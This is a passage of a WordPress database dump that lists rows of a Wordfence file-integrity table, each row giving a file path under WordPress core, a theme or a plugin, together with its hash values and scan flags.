(0xcf9ea2d3dac0aa3c10f29082f2e7ea3f, 'wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/mode-css.js', 0, 0x37d7cbef8a0c2651754375666ec99a55, 0x37d7cbef8a0c2651754375666ec99a55, 0xd65eb180aaacaa171b2616db4c9ac0ebdc3c2f016404aad8b7df241c513286ad, '', 0, '?'),
(0xcfa4297295fa3b222f524435f9ee30b8, 'wp-content/plugins/revslider/public/assets/assets/svg/toggle/ic_star_border_24px.svg', 0, 0xd91baf8dc4f95a8bf15ebd284431b1f1, 0xd91baf8dc4f95a8bf15ebd284431b1f1, 0xbb8e696aaacdc84eb4c22ae337647435c9d9902303832b1c8b2c002289dde7b9, '', 0, '?'),
(0xcfa7f1b425e20a6237ea141f446ea059, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_message.php', 0, 0x670b137c7b4c57a0e3bd4e641865d1de, 0x670b137c7b4c57a0e3bd4e641865d1de, 0xc6309cb9d1943eb5878d0ca7bb8540d582c4209857b421c92a698e36e37ecdce, '', 0, '?'),
(0xcfb0b30d24e251ef4a854c328241451d, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_smoking_rooms_24px.svg', 0, 0xa34ad17417e835c77cfb9d4c47c18855, 0xa34ad17417e835c77cfb9d4c47c18855, 0xd6ba36d073bf615bd3e6332890fb5d4148af24329935caf077c3dfd417309188, '', 0, '?'),
(0xcfc2c813adc10b48d4b9f2dc66eb6be1, 'wp-includes/js/tinymce/wp-tinymce.php', 1, 0x00000000000000000000000000000000, 0x300743a1814a972b20d7f0655f3f59aa, 0x6e69d1fe51e718037f62712aaf7fbb95ba1e541e38c83160a8e94bfd948bc71f, '', 0, '?'),
(0xcfd71280794b76e701d32ef91a10b111, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php', 1, 0x00000000000000000000000000000000, 0x350cbbf4be1d939140d43fa3f3f655be, 0xc6b1ad23841071a09d28c6599a73b7a394eb8d71138203c9f30c29c07db703d2, '', 0, '?'),
(0xcfdd99aa50289983c94f270e4591f965, 'wp-includes/js/jquery/ui/effect.min.js', 1, 0x00000000000000000000000000000000, 0x318747d327332bca86b5f101420c4209, 0xb40b401e20376528852c3ca6171030ba17edbc460a564055af161fe1c3d62735, '', 0, '?'),
(0xcfe6191e477dab9035df0ddf948a5cf4, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/tooltip.min.js', 0, 0xb3d40a9ce4f41c9042cc9547c88467ec, 0xb3d40a9ce4f41c9042cc9547c88467ec, 0x594e48eaf8cd16f42d63065d73eede7786b5acddcfa088d14c1c77af40a68705, '', 0, '?'),
(0xcfe98bada1827b5eaa074d552af48d5f, 'wp-includes/js/twemoji.js', 1, 0x00000000000000000000000000000000, 0xc9e9b421239fdb7f771bfc8e8c74dd2b, 0x1a0e5b3bceb2709133504b971968765073e53db0b0bc0bc12e2f125c8519928c, '', 0, '?'),
(0xcff7c302a199556a24c4c2ab39a6af7c, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/info-banner.min.js', 0, 0x89ae63895275234df7068caead49d640, 0x89ae63895275234df7068caead49d640, 0xc8cb478d27d36d0809b65ced9fe675df8371aba1deffd16d04584fc7ee05ea1b, '', 0, '?'),
(0xcff8c8560459fdf5cfa7fb1bdf0c7763, 'wp-content/plugins/js_composer/assets/lib/vc_round_chart/vc_round_chart.min.js', 0, 0x43993fc07ae100b32cf11da5cc6105fb, 0x43993fc07ae100b32cf11da5cc6105fb, 0x3f0cf1eefd7bc637b1e87824698e7559862b791e93b624ac2c1d6bb67e7de588, '', 0, '?'),
(0xcff9551c443c5249b7641d78e0b71770, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_1_24px.svg', 0, 0xb29064f3422a4d76cba48ebb1711dc22, 0xb29064f3422a4d76cba48ebb1711dc22, 0x182f6ab654a50364e67898df74ac6df36731262446cdf062c337becb083dfaa0, '', 0, '?'),
(0xcfff40b6f7414f3d09f279171341bc0e, 'wp-includes/class-wp-paused-extensions-storage.php', 1, 0x00000000000000000000000000000000, 0xda4fcf53f91e5905e75efe7d1f7bc473, 0xb7d9b123afc9d216f0716684a77ede180f9ace792674a3a48d63e157711d8a81, '', 0, '?'),
(0xd0022db9421050cd95e7be3594cfeafb, 'wp-content/plugins/js_composer/include/templates/editors/partials/vc_settings-image-block.tpl.php', 0, 0xd0816d7a548a9c462881a6044ad96a91, 0xd0816d7a548a9c462881a6044ad96a91, 0x2b10201859e744a98fbd2b7fc61803504ad0c6dab75ba7f3788592de0cf2a263, '', 0, '?'),
(0xd0045b7b783734d6ae3e22d7811088fb, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_voice_24px.svg', 0, 0x993bd58b09b582692487f6a398c4f412, 0x993bd58b09b582692487f6a398c4f412, 0x19ac5883c4aa56fccd0e752e51d73ea178f5ab2f82a1627b9fe7fdd51c8a416a, '', 0, '?'),
(0xd00811ac5d6dd9b2a71f0907e296adec, 'wp-content/plugins/wordfence/vendor/composer/installed.json', 1, 0x00000000000000000000000000000000, 0x3e77d0cca909f7d3264abc9ca1018529, 0xb1f09912ab4dd7f32cb9503a94026b800a7f4ee232855b73040a577a655d6f4e, '', 0, '?'),
(0xd012d0c3106f1ce5ad2147ced85ade16, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_36px.svg', 0, 0x423f2e9ea3ed9bfe4777671ec11d50ea, 0x423f2e9ea3ed9bfe4777671ec11d50ea, 0x424e88c783ba568e5bf683bb51dc40824a053263384219210d38cfe64e748e95, '', 0, '?'),
(0xd02523f3ba1fe97415c1cf07f2348478, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php', 1, 0x00000000000000000000000000000000, 0x1b7912a85701fb307b58e56ea75aff30, 0x19c500410256f08c525888cac895ca7edc18e164a7135eed2f2985144052f2c6, '', 0, '?'),
(0xd03e366259a3b99541550c460bf02e01, 'wp-includes/blocks/archives.php', 1, 0x00000000000000000000000000000000, 0x86e6e5e9bca5e60b51a42637b49d1035, 0x0d8dcb2b7998ee0bbbf672f0ba79cfe920c93f940c74ded2fe9980bc16e27b88, '', 0, '?'),
(0xd03e9b7306cb1f6c019b574437f54db0, 'wp-includes/bookmark-template.php', 1, 0x00000000000000000000000000000000, 0xae1d39088ebb77302a94b441a4975525, 0xfb71774ab678da24298d4faab8c11811d5d1cb9d82c006771b84f2e906e16b5f, '', 0, '?'),
(0xd047dd84b5756d5fb84dc4ed4da5e78b, 'wp-content/plugins/js_composer/assets/fonts/vc_icons/fonts/VC-Icons.svg', 0, 0xfdf2432ee06b1050dfc8ce3c3ea1111a, 0xfdf2432ee06b1050dfc8ce3c3ea1111a, 0x9a2c8fcf59c110e5e70b9735aea5c09e2449eb437109f9316bf5d10fb1ee0695, '', 0, '?'),
(0xd05c25560b802802d6900b6483dbb77c, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_connected_24px.svg', 0, 0x6ef415e739a253f6084e6a28870e9831, 0x6ef415e739a253f6084e6a28870e9831, 0x1d734906561ead8912fefb4aae699aded3ea1caca841694fb16e5f6d5492b3bf, '', 0, '?'),
(0xd076331763ed98416b61efc68e618b1a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money2.svg', 0, 0x59bbcd79c806f388180dc616e87043fb, 0x59bbcd79c806f388180dc616e87043fb, 0x110d203a168b743662e9b621661b8687770b5ceef2ce2f9c45e5adcea9146e53, '', 0, '?'),
(0xd08852cac376b257484fcc2c0b331fe9, 'wp-content/themes/Impreza/framework/vendor/usof/templates/field.php', 0, 0xc81c0d201e3d32b1281cb297b2445de9, 0xc81c0d201e3d32b1281cb297b2445de9, 0x5d2ef3e596312675559968ef64dab6b46d54dd64be3f91c3bc78af3f1ad63a85, '', 0, '?'),
(0xd09d7382b4cee8e819c3ffb3263170c7, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_24px.svg', 0, 0xd4a1e3c049f1eb9d5c37a7673b3b4965, 0xd4a1e3c049f1eb9d5c37a7673b3b4965, 0xf6eb7d3c311701400f11bde1936d2bfc39ae4f92213df5343daadc73aeb87288, '', 0, '?'),
(0xd0a27f92ed8eb9827ce18ed1e4d84019, 'wp-includes/images/smilies/icon_arrow.gif', 1, 0x00000000000000000000000000000000, 0x2009c9ff4a3cd667fecc6f9d08393a78, 0xa56e1c8163b2eed6783092c4a5e3c2e1748b944e85a1d8debe59083258002119, '', 0, '?'),
(0xd0b1cefe30fc5a073c58e8559622812a, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_touch_app_24px.svg', 0, 0xfbbe678626055c2c6fb54930c6556ea8, 0xfbbe678626055c2c6fb54930c6556ea8, 0x5d8d5c1177f7fa7ab089e291055f904bd218a5cda07bb7cd3b44a073c812d664, '', 0, '?'),
(0xd0d62f81a81c3f9fe096dadb55f187ea, 'wp-includes/Requests/Utility/FilteredIterator.php', 1, 0x00000000000000000000000000000000, 0x10f9a2d9618ed678b72541aa9e0579d3, 0x4ccc43a8b055c1c9e4d868553b34e66e7d0e526daba4783be8a8c48c1edcdf1c, '', 0, '?'),
(0xd0d6325bf176185c299b4986ddf05102, 'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php', 1, 0x00000000000000000000000000000000, 0xf2bafe0b7ebb9e6344d8324ab883efe5, 0xfec1877bf54160cccaade58e81547d915e6ac08ec810c32745db914b0247a145, '', 0, '?'),
(0xd0d85eba5cb6580ce8507653ac5cf77b, 'wp-admin/js/media-upload.js', 1, 0x00000000000000000000000000000000, 0x3fc8d4f8151f3ca1dc9804b947934218, 0x844cba213fa893065397f8adef98119f2806f6ee09fb0bba7f7cd0e5b250322d, '', 0, '?'),
(0xd0f4d203cfcd2cd9e17f1811f166ebd7, 'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php', 1, 0x00000000000000000000000000000000, 0xce5ac6be42d82c1f4a2954f081996378, 0x0049054daf199903a97c25cd6315caee74ec00efcea6d7e0d471f9af73e1ed35, '', 0, '?'),
(0xd140e0676bfdc5db3b6cb7b5ffce3069, 'wp-content/plugins/js_composer/assets/lib/bower/skrollr/dist/skrollr.min.js', 0, 0xbd19da911f4a85f6a9cd8989b1c935fe, 0xbd19da911f4a85f6a9cd8989b1c935fe, 0x431cebc7d24059c6efb47b40d2f4906a2206d97dc2976159861a1989299d9904, '', 0, '?'),
(0xd15f5c63396d4c8a76e9e8a33189d1fc, 'wp-includes/compat.php', 1, 0x00000000000000000000000000000000, 0x29ac40417862fc86608ae85f9434de32, 0x95e0b2a9a174814f212b503e6bc1a9c78e2937ac51322a7099b478df5553cffc, '', 0, '?'),
(0xd16d61f50e764d769f1c4b12f3b3a51a, 'wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php', 1, 0x00000000000000000000000000000000, 0x740e869e47beee4ec6dc38b109fae836, 0xd7c059b3910116a356299b636514572fff5aa3b56dd2b36e276ec300d04d4b7e, '', 0, '?'),
(0xd1727facf35d523c44da919c3dd649dc, 'wp-content/plugins/wp-super-cache/plugins/dynamic-cache-test.php', 1, 0x00000000000000000000000000000000, 0x6aead89f7014508fddd2177855839a75, 0x913c91e42e1ae7304d6b40a792b81dc0e4bfc7f865910478916f088428384ed0, '', 0, '?'),
(0xd175526ca374d007ddcdc0b4229318d1, 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php', 1, 0x00000000000000000000000000000000, 0xfcedfb37d68a695b4caf39c6814809a5, 0xdfb97b3828fc95c38f6174fbff0043d46e3351ed84daa40a896c3fbc1e2479f1, '', 0, '?'),
(0xd18073e88a24501cbed36c4049fe9623, 'wp-content/plugins/js_composer/include/classes/shortcodes/paginator/class-vc-pageable.php', 0, 0xdf921f645a99f95475974628ec2253ab, 0xdf921f645a99f95475974628ec2253ab, 0x87b1b5dbb16aac09ae08bad861843b78edc425a238cea7ad1765b3ac741cd5bd, '', 0, '?'),
(0xd18bc92aad0cfc109d621359eeb46bd2, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_web_24px.svg', 0, 0x3d3e44bfa53380968c0f982a6c041d5e, 0x3d3e44bfa53380968c0f982a6c041d5e, 0xe0aea5bcab4d422bc91450f8e91a911f599f1077bef14fb0a1a3f559776872a2, '', 0, '?'),
(0xd190134ebedabaa69adf27479dcde785, 'wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-regular-400.svg', 0, 0xdee8820cb8ee3ed7dcdcaf1638977017, 0xdee8820cb8ee3ed7dcdcaf1638977017, 0xd28a74d105c33edcf55cd3a17689819f0a3f68e06e656ad45dabcc4e0fd1ca68, '', 0, '?'),
(0xd1956c7c2c3a52a69538b60bc8732848, 'wp-content/plugins/js_composer/include/autoload/vc-image-filters.php', 0, 0x60bcaf6c65b5114f84bbc3a4f7bbb0db, 0x60bcaf6c65b5114f84bbc3a4f7bbb0db, 0xd3e364624f7f36b30cbd0ddbd9ca4577a6b5a7a1511417792a05b95f070835a6, '', 0, '?'),
(0xd19f89c8a9f782f610a7806d32fc8205, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/presentation02.svg', 0, 0x802c6bf2c2546ec267f15564126aed57, 0x802c6bf2c2546ec267f15564126aed57, 0x568ec8110243ff48b0106652bc16cdddf02637267e70e1778aaa48b491a43e59, '', 0, '?'),
(0xd1a0bca1dcb1b3b455664f932909b430, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wallpaper_24px.svg', 0, 0xc5c0f6cfc7b84ea13c9c0d497d36aab4, 0xc5c0f6cfc7b84ea13c9c0d497d36aab4, 0xefa423d7ab4e6acb876c1cabeebc3f5b841fdfada1a0f1c43a436cfef30773c0, '', 0, '?'),
(0xd1baaebaf2c7ba98a1e75823e1ee1ed8, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_column.php', 0, 0x3ee4bbb417ad6fa1c35d2533c690ccf5, 0x3ee4bbb417ad6fa1c35d2533c690ccf5, 0xaf3c7f77295e9780a5b32082feb40f3a97abdb37dc2de1baa1e4887f64182bcc, '', 0, '?'),
(0xd1ca44214dfbd31b0980d1ddb959c254, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/count-timer.min.js', 0, 0x4ef58a4974ea46a1f74c15012f01a260, 0x4ef58a4974ea46a1f74c15012f01a260, 0x3a8b21cd1ef7abde54640e758b9986c5de39b130dea220b3192de9db9f6932a0, '', 0, '?'),
(0xd1f286bed45fa75623f0aafeade64274, 'wp-content/wflogs/config-transient.php', 0, 0xefe9448e678d5852dc845b738eea73be, 0xefe9448e678d5852dc845b738eea73be, 0xfa9c50567c9a3ed41fceeddc8026768c923eb1e0bd438e744b4f13ecc18a0a4a, '', 0, '?'),
(0xd20f4a687cb19430e7830b605a709845, 'wp-admin/user-edit.php', 1, 0x00000000000000000000000000000000, 0x4b7e633e696bf9d09a4e5bcfd7b2d3fa, 0x9c84dab568ada36b08c8e65c770e926aef5e6228ce3e0df31e7ee649466a9548, '', 0, '?'),
(0xd2158fe30ac1743512b83a3ef51b050d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character08.svg', 0, 0x28e6dbad73e785d4e58455d63742a28f, 0x28e6dbad73e785d4e58455d63742a28f, 0x51756f68d85257afd3344c8dccd0ba42a860f40ea11e75b0fb42c688c62e5505, '', 0, '?'),
(0xd215b3d15affba8c73a0e1b6c9189d73, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_circle_24px.svg', 0, 0xde01b6dee308151d5c91b682ce371962, 0xde01b6dee308151d5c91b682ce371962, 0x426b74e0ac0560675fcafd54c88c02a875f1cb4150f80b1b3af5cd995ed64064, '', 0, '?'),
(0xd23703b55b2a77a24a0a6e1288acba3e, 'wp-includes/js/dist/redux-routine.min.js', 1, 0x00000000000000000000000000000000, 0x8923ea20eee433c28a5d36f3e07dd5a5, 0x55f643d6fa1ce46afb5be0af9e7063e72a579cb9d687d26b5feea042bccb6217, '', 0, '?'),
(0xd254149345e53f1f1984cdd76a7afeca, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_refresh_36px.svg', 0, 0x9fc3e108e4a37a96d9a42a67876290fc, 0x9fc3e108e4a37a96d9a42a67876290fc, 0x23fb4f4edd344f47b02ccd00dba2512c34935f35f3ea986bcb5bad508b290f10, '', 0, '?'),
(0xd26eb59186e09282463337904cdfa1c1, 'wp-content/plugins/js_composer/include/autoload/vendors/gravity_forms.php', 0, 0x88901cd2c72dd10a730a486711b632c4, 0x88901cd2c72dd10a730a486711b632c4, 0xcb7af3dc05ff5a0d7b79bd64e92d3e5b4df22f63db51fa37eb318d87a04da35e, '', 0, '?'),
(0xd282f6811eb5d9ff595d7a461ee86921, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_2.php', 0, 0x7e472c343af7f74b38469df0a3e15027, 0x7e472c343af7f74b38469df0a3e15027, 0x290d63444fbb7f4cbe55031abd408a33bb869237159b80d1eba20823ada16689, '', 0, '?'),
(0xd293c3597a1e24b8e9d309c7c81a2b1c, 'wp-content/plugins/js_composer/include/autoload/bc-access-rules-4.8.php', 0, 0xe8b31e05f80e7445284b22d69c133a8a, 0xe8b31e05f80e7445284b22d69c133a8a, 0xf4229465643c64a2c86d1f14219a38895245979bf8d1d765b99376dffbba4316, '', 0, '?'),
(0xd296368ad0f24dd6a614b6ae357748cc, 'wp-content/plugins/wordfence/views/options/option-text.php', 1, 0x00000000000000000000000000000000, 0x7dd6e0ff4bcb0c6d8377b64b3520494f, 0x9781942b6490996edcdd5cc41c2f4d2b7b782f28681adbde2d7a7f259c3172c7, '', 0, '?'),
(0xd29eb3e5faecc79ff603094b73cdd7d0, 'wp-includes/images/icon-pointer-flag-2x.png', 1, 0x00000000000000000000000000000000, 0xa9e5e1a632f1b3b962e4c426d55acc72, 0x34f6819442c8a5c40baa27782b63d268b9d2a0566e9f35ae49da3e06836adecb, '', 0, '?'),
(0xd2aa2a8fe3d41f489aaaa80a3b74b2fb, 'wp-admin/includes/ajax-actions.php', 1, 0x00000000000000000000000000000000, 0x6d3f01ad9af98125e18e56623b36878a, 0x7a2fc1474f22844351d37b7e457a61f6a60da88222a876c9905731e21fa0baf6, '', 0, '?'),
(0xd2adf3905f566c4bf867b02101708631, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php', 1, 0x00000000000000000000000000000000, 0xcdc1f87cacd8ddecaf44234444332989, 0x68898c9ee9cf3d5575bc07c41b565512a22db3124af1de812751ca3b327267ab, '', 0, '?'),
(0xd2af8b65d41613a4ca0782b88d862b66, 'wp-content/plugins/js_composer/assets/lib/vc_accordion/vc-accordion.min.js', 0, 0x6dcb6dc330fcc584b31ff3cf8d29600c, 0x6dcb6dc330fcc584b31ff3cf8d29600c, 0x087a169a7dd6f8b00c4cf89f75086c38eeb3b6c672b0f749337e591c447deb17, '', 0, '?'),
(0xd2b20b45357cd2d1b589438264e997bc, 'wp-admin/options-reading.php', 1, 0x00000000000000000000000000000000, 0xcb26dbc18a3c9a502589b4978ef16416, 0xcfe1dc80008eb4c45470d24ed628bafc1b91e399023309b3b0423e9ba066c606, '', 0, '?'),
(0xd2b929134547da54a5c0eccdf8683ec8, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_button2.php', 0, 0x43583669afa625d58607f1092d0bbc50, 0x43583669afa625d58607f1092d0bbc50, 0x53ca8b1185504bd77f5d4e0955b5f8c966b15ec3b23fcfd67944c6308a799bb9, '', 0, '?'),
(0xd2c0c2024829ec8c39e5a5560c7f2b19, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chemistry.svg', 0, 0xc884fdf8e4b6cd2a79a91586e465e96c, 0xc884fdf8e4b6cd2a79a91586e465e96c, 0xfbe4559aa7635e82e139e440bacb8c3b76198b3a9b4f38b78f7ca94494b11388, '', 0, '?'),
(0xd2d54c7435393396755e98ebe429d9d4, 'wp-admin/images/comment-grey-bubble-2x.png', 1, 0x00000000000000000000000000000000, 0x9d5459d3c59d32b602732c0df56d83bf, 0x441189c5c078ad8f8c542da1a1e6dcfe778518c34e8409a0be508c7b12a6821b, '', 0, '?'),
(0xd2d8e38b1a0ce9f5da10500093dec359, 'wp-content/themes/Impreza/framework/config/meta-boxes.php', 0, 0x63272cbac0e212bbcf490277a26544d9, 0x63272cbac0e212bbcf490277a26544d9, 0xa6d079022b3b14bca4a558125ef4e07f86c4b300fd5cae09170ed8eca9c02e52, '', 0, '?'),
(0xd2dc4b67339973551f2dd2381bd142f3, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dns_24px.svg', 0, 0x073212aaa3bc50a079d891503d5ae20b, 0x073212aaa3bc50a079d891503d5ae20b, 0xb4a59ca917468b9dd1524e676fc8fa8b5fd83f9b9d1bdb4ffc9343776c301d18, '', 0, '?'),
(0xd30b77835d6349fd157782e9c8b0d848, 'wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js', 1, 0x00000000000000000000000000000000, 0x1209a4457fcf2627d2a93bc840fa6b5a, 0x4c06ccdd8f9b991871c53b46583a1c7442c537761db04771e16e33c3906bfd49, '', 0, '?'),
(0xd33aa1725e607e8285b141962f0170c9, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/ext-searchbox.js', 0, 0x589a28a345caf2d8da4f44c6d21f0635, 0x589a28a345caf2d8da4f44c6d21f0635, 0x7529e22161ea33e997b537b06a59b6b069c4c83b626214ed068a69c3ad71b6bb, '', 0, '?'),
(0xd345236cf0c24cfee65f26dcaab3c2ef, 'wp-admin/images/arrows.png', 1, 0x00000000000000000000000000000000, 0x7fda76920124f03e88d1dfd93e03bf59, 0x92595789129a280c86f04e33961232553bd5e20ec6ced13c2e6917446421c4d1, '', 0, '?'),
(0xd34726a4e326d55c7ce88ad77e3f06b1, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_full_24px.svg', 0, 0x89c2e8e0013dc26e567e16744d8c0380, 0x89c2e8e0013dc26e567e16744d8c0380, 0x31ceb0d8518354c581ab28fad91789bbf823c3f53e7e90f71d7df657774c9271, '', 0, '?'),
(0xd348208a2539ddded56cb6d48594450b, 'wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php', 1, 0x00000000000000000000000000000000, 0x52984fc9491611a79c8abcff49d4a57b, 0x39595af68d417d37e23d1ed6dc3aa01827466ffe47f427c752b2c9b9f15f2d1f, '', 0, '?'),
(0xd34de31c18230c2ddfbfd626e959847d, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sim_card_alert_24px.svg', 0, 0xe7304eac0d27304d3886abec827eb457, 0xe7304eac0d27304d3886abec827eb457, 0xc0f1a00a9f31ea6bf70c2584a4b96645b60725500967a90696d6fb877a78dab9, '', 0, '?'),
(0xd34fb62c9e2ee6b78e0a3fe4d06959af, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/outgoing.svg', 0, 0xfe9d048daf3e5fa9623784ed9d33d912, 0xfe9d048daf3e5fa9623784ed9d33d912, 0x74c88e2a604aaeb7e84affaed2d6956b95a5a647b5207316902367d41d8bd704, '', 0, '?'),
(0xd3523b45f88c9a6a35c0ef9e3111408b, 'wp-content/plugins/revslider/admin/assets/imports/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xd355f7806ed02f7c724019daaaf2d7c1, 'wp-content/wflogs/config.php', 0, 0x1f23b61b5d6dda5dd84d3d180fddee79, 0x1f23b61b5d6dda5dd84d3d180fddee79, 0xee81aa4432d3e0f229d13f21ee48af28c9adb11c2c962808b36d3e21ec91c5d8, '', 0, '?'),
(0xd3690ffe62570e789b6f34c36abe3fc0, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-advanced-custom-fields.php', 0, 0x2fbbbe97390b644b78e732791763e015, 0x2fbbbe97390b644b78e732791763e015, 0x67c2cfb988813fc1af94fcbf800ffcce887f5090979231773dea6b03b0f68384, '', 0, '?'),
(0xd36a7313a49e7732f9ec1270aefd7153, 'wp-content/plugins/wordfence/lib/wfIssues.php', 1, 0x00000000000000000000000000000000, 0xc733291a1ed72fe53c98b749f5fc0fda, 0x17054a026160d2a2ba7b47b679ad0e70d2988c2d4a862879712d0a7795cd6726, '', 0, '?'),
(0xd36bbefbd85d9cba7f6c4b865649be24, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tour.php', 0, 0x2ef266b8e246e9e6a22bca552fbb970f, 0x2ef266b8e246e9e6a22bca552fbb970f, 0x108da487289f1ed986613c531cf813887071a1ba78b9909061147a8a98698667, '', 0, '?'),
(0xd37bdaad643354fa5879bd91f1d0373b, 'wp-includes/css/admin-bar-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x64206aaba162a411b337d64de20ecfea, 0x141912932d744e356ba1157ebc8b60519276f8e3d2ae05d59e6f0065f8129e06, '', 0, '?'),
(0xd37d15b3efaa65a8e9437fd3cb218e2a, 'wp-includes/js/codemirror/codemirror.min.js', 1, 0x00000000000000000000000000000000, 0xf2d20913fc0766828268883b66af71ec, 0xa8758e2ac351df36f6c684db64aa147664c8878f5fb9fb931800b7d4fba2b499, '', 0, '?'),
(0xd3819d43d5d5ae88df2b3951bd88dc97, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_photo_24px.svg', 0, 0xb096f0da76cb90cda6463183c7383f10, 0xb096f0da76cb90cda6463183c7383f10, 0xc9a7624ebd3dcd2ccb67ea3872f609284dab8da2586a4f8fe541e360738fc013, '', 0, '?'),
(0xd395cbfd819604c20aa7ae0c74ca3014, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff', 1, 0x00000000000000000000000000000000, 0x6d7047ccd1d76142fe9a4e583e9cf328, 0x25c12d2acea836469ec869ba0d1657cfb9894dd7bdac5749b185863a8f76fd44, '', 0, '?'),
(0xd39fee02f106c76d79ac2b0a661de93a, 'wp-includes/js/wp-api.min.js', 1, 0x00000000000000000000000000000000, 0xb7d6e1947ae62e2bcf6973d884b1a105, 0x76196cc7984e84124fb7d9619d83a7b86f2343fdbfbb0af219cab3859e948b2b, '', 0, '?'),
(0xd3abe6c652ec130e9dca1d3e6ae64931, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_space_bar_24px.svg', 0, 0xe181623f88c4be1c0dc81fb0c2926f15, 0xe181623f88c4be1c0dc81fb0c2926f15, 0x4b367783587eea1ebd2969b673ea05d48f8ad17eb951ced6aa2f2503da91ba81, '', 0, '?'),
(0xd3b9037d60f2f4516c87f8c3aa6eecd9, 'wp-content/plugins/Ultimate_VC_Addons/assets/fonts/index.php', 0, 0xb82dc7457005bb698e35f7185a1f5612, 0xb82dc7457005bb698e35f7185a1f5612, 0x4ccb304a2d238a28edc684aa33d7e57db82c36f95eaa53e0b5a7453cbb29803c, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0xd3c2c711fddc4276a66718714ddc9168, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_boat_24px.svg', 0, 0xa62c7ca1a045769520caacec9017be20, 0xa62c7ca1a045769520caacec9017be20, 0x4dee6b658826bb951965d0a9c0f51d7579c5a92c88d2face46a79b170bf8e5d5, '', 0, '?'),
(0xd3f3c14937df8753d11c329126b08e88, 'wp-admin/erase-personal-data.php', 1, 0x00000000000000000000000000000000, 0xaa5a05f2e247029481af8b589d1c3a83, 0x48a8fcdc24769cf23ec8b54868e3a996c4a9ff19b6f4fb262640453317ea3f9e, '', 0, '?'),
(0xd40087bd4464341fa8ef1deec042f560, 'wp-content/plugins/js_composer/include/params/el_id/el_id.php', 0, 0x073ae3547ee4f9163ea9c737fc20641f, 0x073ae3547ee4f9163ea9c737fc20641f, 0x9291d8df09a7c6a883823d3327a1040f2a9b8af816aaaa6109df217d180897e9, '', 0, '?'),
(0xd40ce8f2ff010fe59dcd302aee57c7d4, 'wp-content/plugins/index.php', 0, 0x67442c5615eba73d105c0715c6620850, 0x67442c5615eba73d105c0715c6620850, 0x6b8d898dc0977e09b6bd55481aa5d678831850eadb41cc84a2fa3ca19e3b58a8, '', 0, '?'),
(0xd411b2708e5e18d232f5027bc912b62a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-down.svg', 0, 0x4bf35d7090aaf821b19099e27311ab5d, 0x4bf35d7090aaf821b19099e27311ab5d, 0x6d9d8c0ddc5a061a670bb9bc9dc867969610a68c09a2b30014e76a6a9b4c1979, '', 0, '?'),
(0xd41964ea9c16429071136fdd7cf0f5db, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_graphic_eq_24px.svg', 0, 0x5e48ae8d7d54c79a65e5d909ef8bfd2b, 0x5e48ae8d7d54c79a65e5d909ef8bfd2b, 0x9f842ac5f88a558abdd6592df5e8dcdc7d39deb30dbea9844dca43020c107ee6, '', 0, '?'),
(0xd427db311f69d35f481ec554d4578473, 'wp-content/plugins/js_composer/assets/js/vendors/yoast.js', 0, 0x05bf37f064f40083c6b0657f23802f57, 0x05bf37f064f40083c6b0657f23802f57, 0x56203f3be5a3093661d0c3e3e761ca12671bc0e8622b469f42b6153bde181250, '', 0, '?'),
